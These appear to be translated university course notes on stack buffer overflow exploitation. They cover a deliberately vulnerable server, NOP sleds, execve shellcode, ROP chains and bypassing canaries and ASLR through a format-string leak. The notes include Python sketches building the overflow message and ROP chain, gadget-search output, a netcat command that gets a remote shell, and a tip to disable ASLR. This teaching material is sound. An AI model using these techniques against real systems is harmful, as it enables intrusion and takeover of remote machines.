===================
Class 11: Exploit
===================

Date: 13.05.2025

Additional materials
=====================

.. a:
   - :ref:`08-assignment` -- This got lost somewhere in the repo!

- :download:`exploit-x86_64.tar.bz2`

Program stack
=============

Every process has a stack, provided by the operating system. It is nothing
more than a mapped, contiguous segment of the process's address space together
with a stack pointer register (called SP in this scenario). Local variables,
return addresses of currently executing functions, and partial results of
calculations are stored on the stack. The implementation of the operations is
trivial:

- putting data onto the stack means writing to the memory pointed to by the SP
  register and modifying this register by the size of the written data
- taking data from the stack means reading from the memory pointed to by SP
  and modifying SP by the size of the data being taken

The operating system initially maps a predetermined amount of memory for a
program's stack (around 2 pages), and allocates subsequent memory pages only
when needed.
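
The push and pop operations described above can be modelled in a few lines.
The sketch below is a toy model, not a description of any real CPU: the class
name ``ToyStack``, the 64-byte segment and the 8-byte word are illustrative
assumptions, and the stack is assumed to grow towards lower addresses (the x86
convention).

.. code-block:: python

   import struct

   WORD = 8  # assumed word size in bytes (x86_64)


   class ToyStack:
       """Toy model of a downward-growing stack (illustrative only)."""

       def __init__(self, size=64):
           self.mem = bytearray(size)  # the mapped stack segment
           self.sp = size              # empty stack: SP sits at the high end

       def push(self, value):
           # Move SP by the size of the data, then write at the new SP.
           self.sp -= WORD
           struct.pack_into("<Q", self.mem, self.sp, value)

       def pop(self):
           # Read from the memory pointed to by SP, then move SP back.
           (value,) = struct.unpack_from("<Q", self.mem, self.sp)
           self.sp += WORD
           return value


   stack = ToyStack()
   stack.push(0x1111)
   stack.push(0x2222)
   top = stack.pop()  # the value pushed last comes out first
   print(hex(top), stack.sp)

After two pushes and one pop, ``top`` holds the value pushed last and SP is
one word away from its starting position, which is all that allocating and
freeing on the stack amounts to.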

i386
----

For the purposes of this scenario, we will focus on x86 architectures:

- SP points to the byte at the top of the stack
- the stack grows downwards, meaning that putting data onto the stack
  decreases SP
- on Linux and BSD, the function caller should (in the classic case, more in
  [1]):

  - save the contents of registers other than BP, SI, DI, BX (if it will want
    to use them later)
  - put the arguments onto the stack in reverse order of their declaration
    (last argument first)
  - jump to the body of the called function, putting the current location in
    the program code onto the stack (the return address)
  - upon return of the called function, remove the arguments from the stack
    (the result is in AX)

- the called function should:

  - save registers BP, SI, DI, BX if it intends to change them
  - optionally set the BP register to the content of SP (needed to obtain
    stack traces, simplifies the assembly code, but is not mandatory; in gcc,
    generating such code can be disabled with the ``-fomit-frame-pointer``
    flag)
  - reserve space on the stack for local variables (by shifting SP)
  - execute its body
  - restore registers
  - put the result into AX
  - jump to the address from the top of the stack, that is the return address
    placed there by the caller

x86_64
------

In the x86_64 architecture, function calls look very similar, with the
difference that the first 6 integer or pointer arguments are passed in
registers RDI, RSI, RDX, RCX, R8, R9 (floating-point arguments use XMM0-7).
If a function has more arguments, they are passed via the stack, just like on
i386. All addresses are 8 bytes wide.

Disadvantages and advantages of the stack
------------------------------------------

As can be seen from this scenario, allocating local variables is very fast,
because it boils down to modifying one register, and as long as the sizes of
local variables are multiples of the processor's word size, there is no
fragmentation problem.
These two features give stack allocation a significant advantage over heap
allocation: ``malloc`` needs complex memory management logic, and
fragmentation is difficult to avoid. Nevertheless, the stack is not suitable
for holding variables whose lifespan exceeds a single function call.

Another feature of the stack is that the arrangement of program data on it is
easy to predict and, in the case of a poorly written program, this knowledge
can be used to take control of the program.

Buffer overflow
===============

This term refers to a situation where, for some reason, the program "forgets"
the actual size of a buffer and exceeds its boundaries, accessing memory that
does not belong to it. Example::

    char c[5];
    strcpy(c, "12345");

``strcpy()`` copies a string to the buffer passed as the first argument, along
with the terminating null byte, so in this case it writes 6 characters into a
5-element buffer. The language specification leaves the result undefined, but
compilers behave predictably, and it is easy to guess how variables are
arranged relative to each other on the stack (usually sequentially). This
makes one particular kind of buffer overflow, the stack buffer overflow, easy
to exploit: by exceeding the buffer boundary far enough, one can overwrite the
function's return address. If done skillfully, one can take control of the
program, because the ``ret`` instruction in the attacked program's code will
jump to whatever location was written over the return address.

inetd
-----

``inetd`` is a standard Unix daemon, a so-called superserver. In the
``inetd.conf`` configuration file, programs are assigned to various network
services, e.g., proftpd to the ftp service. ``inetd`` listens on the
appropriate ports and, upon establishing a connection, starts the program
assigned to the service with descriptors 0 and 1 set up so that the program
sends data over the network by writing to standard output and receives data
by reading from standard input.
This approach used to be much more popular than it is today, although this
daemon is still common. A newer version of the daemon is called ``xinetd`` and
differs mainly in the configuration method: instead of one common
``inetd.conf`` file, each service has a separate file in the ``xinetd.d``
directory.

Writing an exploit
-------------------

An exploit is the colloquial name for a program that exploits a vulnerability
in another program. If we are able to track down a situation that allows a
buffer to be overrun by an arbitrary amount, we can overwrite the return
address in such a way that the program does what the attacker wants. For
simplicity, let's assume we are dealing with the following code
(``server.c``)::

    #include <stdio.h>

    int test()
    {
        char buf[128];
        /* unbounded read: input longer than buf overruns the stack */
        if (scanf("%s", buf) == EOF)
            return 0;
        /* user-controlled format string */
        printf(buf);
        return 1;
    }

    int main()
    {
        while (test()) {
            fflush(stdout);
        }
        return 0;
    }

We assume that this code is run via inetd. Our goal will be to obtain
everything that the user this program runs as can obtain. A sketch of what we
will write:

- we will send code to be executed (the so-called payload)
- in addition to the payload, we will send data arranged so that, instead of
  returning from the ``test()`` function, the program executes the payload

Problems:

- check how much garbage needs to be inserted before the fake return address
  in the malicious message to hit the right spot on the stack
- find out what to overwrite the return address with to jump to the payload
- write a payload that does something sensible

Finding out where the return address is, having the source code, is easy:
just count, keeping in mind how function calls look on x86. When there is no
source code, this can be done by dumping memory (the stack) and, starting from
the top of the stack (which is known, because the SP register is known),
looking for 4/8-byte aligned numbers that point into the memory area where the
program code is mapped.
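
With the source at hand, counting under one common layout assumption (no
padding and no canary between the buffer and the saved frame pointer) puts the
return address 128 + 8 = 136 bytes past the start of ``buf`` on x86_64; a real
compiler may lay the frame out differently. Without the source, the
dump-scanning approach can be sketched as follows. The function name
``find_code_pointers``, the dump contents and every address are hypothetical.

.. code-block:: python

   import struct


   def find_code_pointers(dump, dump_base, code_start, code_end, word=8):
       """Return (address, value) pairs for aligned words pointing into code."""
       fmt = "<Q" if word == 8 else "<I"
       hits = []
       # Visit only offsets where dump_base + offset is word-aligned.
       first = (-dump_base) % word
       for off in range(first, len(dump) - word + 1, word):
           (value,) = struct.unpack_from(fmt, dump, off)
           if code_start <= value < code_end:
               hits.append((dump_base + off, value))
       return hits


   # Hypothetical dump: 128-byte buffer, saved frame pointer, return address.
   CODE_START, CODE_END = 0x400000, 0x401000
   DUMP_BASE = 0x7ffc00000f00
   dump = (b"A" * 128
           + struct.pack("<Q", 0x7ffc00001000)   # saved frame pointer (stack)
           + struct.pack("<Q", 0x4006d2))        # return address (code)
   hits = find_code_pointers(dump, DUMP_BASE, CODE_START, CODE_END)
   print([(hex(addr), hex(value)) for addr, value in hits])

Every hit is only a candidate: any aligned value that happens to fall into the
code range will be reported, so the candidates still have to be checked
against the disassembly.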

A bigger problem is finding out where to jump, because:

- the stack address is assigned by the operating system
- at first glance, it is not clear what is on the stack below the ``main``
  function
- even if, by reading the libc and kernel code, we find out what and how much
  is on the stack below the ``main`` function, it will turn out that it is not
  a constant amount, because it depends, for example, on:

  - the size of the arguments passed to the program
  - the environment

Fortunately, on many systems the stack always starts at the same address,
close to the end of the process's virtual address space, so the fluctuations
in the position of the buffer cannot be very large: they depend mainly on the
environment and the program arguments. Hence, the fluctuations in the buffer
address can be reasonably estimated: just run the program with an empty
environment in the ``/`` directory, without arguments, and check the address
of any local variable. It is almost certain that in any other run there will
be at least as much data on the stack below ``main``, so this gives one bound.
For the second bound, a reasonable limit on the size of the environment and
arguments should be assumed. For simplicity, for now, we ignore the fact that
on most current systems the stack address is random (within a certain range).

If we thus create such a situation on the stack:

=============================== ========================
Before attack                   After attack
=============================== ========================
?                               payload
------------------------------- ------------------------
?                               NOP
------------------------------- ------------------------
?                               NOP
------------------------------- ------------------------
?                               NOP
------------------------------- ------------------------
?                               NOP
------------------------------- ------------------------
?                               NOP
------------------------------- ------------------------
?                               NOP
------------------------------- ------------------------
?                               NOP
------------------------------- ------------------------
?                               NOP
------------------------------- ------------------------
?                               NOP
------------------------------- ------------------------
?                               NOP
------------------------------- ------------------------
return address                  malicious return address
------------------------------- ------------------------
optionally saved registers      garbage
------------------------------- ------------------------
buffer                          garbage
=============================== ========================

(NOP stands for some operation that does nothing), then it is enough for the
malicious return address to point to any of the NOP instructions. If there are
enough of them, we can thus absorb the fluctuations in the buffer address.
This technique of inserting a large number of NOPs into the buffer is called
a NOP-slide (also known as a NOP sled), because figuratively speaking, we
slide down the NOPs to the payload.

Technical details
-----------------

Tools:

- ``objdump``: a program that disassembles compiled programs; useful for
  analysis, especially with the ``-d`` flag
- ``ulimit``: a shell builtin for managing user limits; needed only to ask the
  kernel to write a memory dump (core dump) when the program crashes, which is
  useful in debugging (``-c`` flag)
- ``gdb``: a debugger with the ability to load a memory dump
- ``gcc``: for compiling programs, including the payload
- ``/proc/self/maps``: on Linux this file shows the memory mappings of the
  process, which makes it possible to see where the stack starts
- ``netcat`` (``nc``): the program that will be used to send the exploit over
  the network

Step-by-step implementation
---------------------------

The simplest and most effective payload will be launching a shell, i.e.,
executing ``execve``. Since the launched program inherits descriptors, and the
program launched by inetd uses descriptors 0, 1, and 2 for network
communication, calling ``execve`` will achieve an effect similar to a remote
shell.
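
Before turning to the payload itself, the overall message layout from the
table above (filler, fake return address, NOP-slide, payload) can be sketched
as follows. This is only an illustration under stated assumptions: the
function name ``build_message``, the buffer address, the offset of 136 bytes
and the slide length are hypothetical, and the payload is a harmless
placeholder rather than real code. The whitespace check reflects the fact that
``scanf("%s")`` stops reading at the first whitespace character.

.. code-block:: python

   import struct

   WHITESPACE = b" \t\n\v\f\r"  # bytes at which scanf("%s") stops reading


   def build_message(ret_offset, ret_addr, sled_len, payload, word=8):
       """Lay out: filler | fake return address | NOP-slide | payload."""
       fmt = "<Q" if word == 8 else "<I"
       filler = b"A" * ret_offset        # covers the buffer and saved registers
       fake_ret = struct.pack(fmt, ret_addr)
       sled = b"\x90" * sled_len         # 0x90 is the one-byte x86 NOP
       message = filler + fake_ret + sled + payload
       bad = [i for i, byte in enumerate(message) if byte in WHITESPACE]
       if bad:
           raise ValueError(f"whitespace bytes at offsets {bad}")
       return message


   # Hypothetical values; real ones have to be measured on the target.
   BUF_ADDR = 0x7fffffffe400             # assumed address of buf
   RET_OFFSET = 136                      # assumed distance from buf to return address
   SLED_LEN = 64
   PLACEHOLDER_PAYLOAD = b"\xcc" * 4     # int3 breakpoints standing in for a payload

   # Aim at the middle of the slide to tolerate shifts in either direction.
   ret_addr = BUF_ADDR + RET_OFFSET + 8 + SLED_LEN // 2
   message = build_message(RET_OFFSET, ret_addr, SLED_LEN, PLACEHOLDER_PAYLOAD)
   print(len(message))

Aiming at the middle of the slide means the jump still lands on a NOP when the
real buffer address differs from the assumed one by up to half the slide
length in either direction.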

Since it is not clear where the PLT is located (because it depends on the
compiler and on very minor code changes) and even less clear where the libc
library code is mapped, it is better to invoke syscalls manually, bypassing
the wrappers provided by the standard library. Details were discussed in the
second class.

Knowing how to execute a syscall, one should write a program in assembly that
will execute ``execve`` on ``/bin/sh``. An example is in the ``payload.s``
file. The executable code of this program will be our payload. Running
``make show-payload`` shows this code in a form suitable for pasting into C
source.

The ``demo.c`` file shows how to directly transfer control to this code
(``brute_force`` function) and how to overwrite the return address with the
payload address. The address used there is solely a result of calculating what
is on the stack according to the calling convention given at the beginning.

At this stage, we assume that the payload will be placed in executable memory.
In the following part, we will discuss how to bypass this limitation.

The last thing is to deliver the payload to the program from outside, along
with the malicious return address and the NOP-slide. The position of the
address within the buffer follows directly from the ``demo.c`` example. The
address itself, however, was verified experimentally by checking the address
of a local variable in the ``main()`` function. This can be seen in the
``exploit.py`` file.

After sending the malicious data, we need to be able to send commands somehow;
this can be done as follows::

    (./exploit.py; cat) | ./server

Network attack
---------------

To achieve the same effect over the network (inetd), you need to experiment a
bit with the buffer size (the size of the NOP-slide) and the address to jump
to. Then it is enough to use netcat (the ``nc`` command) to interact with the
remotely running server, which will later become a shell.
To do this, run::

    nc -c "./exploit.py;socat STDIO OPEN:/dev/tty" server_address port

If everything goes well, the result will be exploiting a vulnerability in a
20-line program to take control of a remote computer.

Non-executable stack (NX)
-------------------------

One of the mechanisms that is supposed to make these types of attacks more
difficult is marking memory pages that must not be executed (the NX flag). In
particular, the stack normally does not contain program code, so it can be
marked as such. However, this does not prevent the attack, it only makes it a
little more difficult: we cannot jump directly to the payload we sent, but we
can use everything that is already loaded in memory and marked as executable,
in particular the standard library (directly or via the PLT).

On the i386 architecture, one can simply place the address of, e.g., the
``system()`` function from libc at the return address location and place its
arguments a bit further. Here, the address of the string ``/bin/sh`` or of
another equally useful string is needed. Since the exact stack address is not
known, one cannot (directly) provide this string oneself. But a moment of
searching will show that the necessary string is in the standard library::

    $ xxd /lib64/libc.so.6|grep -A 1 /bin
    01841a0: 6974 7900 6e61 6e00 2d63 002f 6269 6e2f  ity.nan.-c./bin/
    01841b0: 7368 0065 7869 7420 3000 4d53 4756 4552  sh.exit 0.MSGVER

In the case of the x86_64 architecture, it is a bit more complicated because
the initial parameters are passed through registers. But again, using what is
already executable in memory, one can search for instruction sequences that
load data from the stack into registers. This technique is known as
Return-Oriented Programming (ROP), because the instruction sequences searched
for (so-called gadgets) will most often have the form::

    pop ...
    ret

In this way, by placing gadget addresses and data alternately on the stack, we
can load the desired data.
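
The alternating layout of gadget addresses and data can be sketched as
follows. This is a minimal illustration, not the contents of any file from the
course materials: the helper ``p64`` and all three addresses are placeholders
that would have to be read from the target process.

.. code-block:: python

   import struct


   def p64(value):
       """Pack a 64-bit little-endian word, as it would sit on the stack."""
       return struct.pack("<Q", value)


   # Placeholder addresses for illustration only.
   POP_RDI_RET = 0x4007a3        # assumed address of a "pop %rdi; ret" gadget
   BIN_SH = 0x7ffff7ba21ab       # assumed address of a "/bin/sh" string
   SYSTEM = 0x7ffff7a52390       # hypothetical address of system()

   chain = b"".join([
       p64(POP_RDI_RET),  # overwritten return address: jump to the gadget
       p64(BIN_SH),       # popped into RDI, the first argument register
       p64(SYSTEM),       # the gadget's ret jumps here
   ])
   print(chain.hex())

Each ``ret`` consumes one word from the stack, so the chain reads top to
bottom in execution order: gadget, the data it pops, then the next address to
return to.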
Sometimes gadgets can be more complex, but to find the simplest ones, we can
prepare a source file with the instructions we are looking for
(``gadgets.s``), compile it, and then search the process memory using the
``searchmem`` function from the peda extension to GDB::

    $ objdump -d gadgets.o
    (...)
    0000000000000000 :
       0:   5f      pop    %rdi
       1:   c3      retq
       2:   5e      pop    %rsi
       3:   c3      retq

    gdb-peda$ searchmem "\x5f\xc3"
    Searching for '_\xc3' in: None ranges
    Found 543 results, display max 256 items:
    server : 0x4007a3 (<__libc_csu_init+99>: pop rdi)
    server : 0x6007a3 --> 0x841f0f2e6666c35f
      libc : 0x7ffff7a3edd5 (: pop rdi)
      libc : 0x7ffff7a3ee02 (: pop rdi)
    (...)
    gdb-peda$ searchmem "/bin/sh"
    Searching for '/bin/sh' in: None ranges
    Found 1 results, display max 1 items:
    libc : 0x7ffff7ba21ab --> 0x68732f6e69622f ('/bin/sh')

An example using this technique is in the ``exploit-rop.py`` file.

Stack protector and address space randomization (ASLR)
-----------------------------------------------------------

GCC has the ``-fstack-protector`` option, which makes gcc place a "canary" on
the stack at the start of each function: a predetermined value that is checked
before the function returns to see whether it has been changed. However, if
there is a bug in the program that allows the memory containing the "canary"
to leak, this mechanism becomes useless. It so happens that the test program
``server.c`` contains such a bug: with control over the format string passed
to ``printf()``, any memory region can be printed. An example is in
``exploit-rop-stack-protector.py``.

Another mechanism that makes attacks more difficult is address space
randomization (ASLR). It makes it harder to learn the addresses to which one
could conveniently jump. And again, a bug that allows a memory region to be
read is enough to bypass this mechanism: given any address from the process's
address space, one can check what should be located there and calculate the
remaining addresses based on that. An example is in
``exploit-rop-stack-protector-aslr.py``.

Format string
=============

Buffer overflow is not the only dangerous vulnerability. As seen earlier,
giving an attacker control over the format string for ``printf()`` greatly
facilitates attacks.
But such a vulnerability can also be used on its own to take control of the
program. Firstly, sensitive data (e.g., passwords) may be present in memory,
and secondly, the ``%n`` format allows modifying memory. Exploiting this is
made easier by the fact that the field width can additionally be taken from
the printf parameters (e.g., ``%*d``), and that the number of the parameter to
be used can be specified (e.g., ``%4$d``, or ``%*5$d``; combinations are also
possible: ``%4$*5$d``). As a result, a primitive for copying data on the stack
can be assembled from this:

- read data by printing a field of the appropriate width: ``%*15$d``
- then write the number thus "read" using ``%23$n``

As long as the interesting addresses are on the stack (or can be assembled
using the above), memory can in practice be modified arbitrarily.

An example program for experiments is in ``login.c``. It is a simple tool that
checks a hardcoded password hash and, if it matches, launches a shell. It is
intended to be installed with the SUID bit set. Additionally, to be more
user-friendly, it lets you provide your own password prompt text.

The goal of the attack is, of course, to bypass the password. To do this, one
must find on the stack the address of the variable that decides whether the
user is admitted, and then supply a prompt parameter that overwrites this
variable.

Moral
=====

The above examples show how dangerous careless programming is. Although this
is an example prepared for a course, the mechanism is common and widely used
in practice. Security reports from internet portals such as Secunia confirm
this. Can we defend against this in any way?
There are many methods; unfortunately, they only make the attackers' work
more difficult but do not prevent it:

- stack randomization (the start of the stack is in a different place in each
  process)
- randomization of the entire address space, including the mapping location
  of libraries and the program loading location
- NX bit (newer processors allow marking a segment of the virtual address
  space, such as the stack, as Non-eXecutable, which causes an error when
  trying to execute the payload)
- gcc has the ``-fstack-protector`` option, which makes gcc place a "canary"
  on the stack at the start of each function: a predetermined value that is
  checked before the function returns to see whether it has been changed
- gcc and glibc have protection against format string attacks, activated by
  the compilation option ``-D_FORTIFY_SOURCE=2``
- resolving all relocations early and switching the entire GOT and PLT to
  read-only

A fairly good way to avoid memory management errors (including buffer
overflow) is to use languages that manage memory themselves, such as Java,
Python, etc. Of course, this will not protect against errors in the
implementation of the compiler or interpreter itself.

Tips
---------

- to disable stack randomization, change the kernel settings::

      sysctl -w kernel.randomize_va_space=0

- to add an ftp-like server on port 21 to inetd, add the line::

      ftp stream tcp nowait root /root/server

- for ``xinetd``, the analogous configuration goes into
  ``/etc/xinetd.d/ftp``::

      service ftp
      {
          disable = no
          id = ftp
          wait = no
          socket_type = stream
          user = root
          group = root
          server = /root/server
          #server_args =
      }

- when working with gdb, the "peda" extension (Python Exploit Development
  Assistance for GDB) is very useful - https://github.com/longld/peda
- in the payload, be careful with whitespace: ``scanf()`` stops reading at the
  first whitespace character

..
   Author: Marek Dopiera
   Update 12.05.2015 Marek Marczykowski-Górecki
   Translated by Gemini: 13.05.2025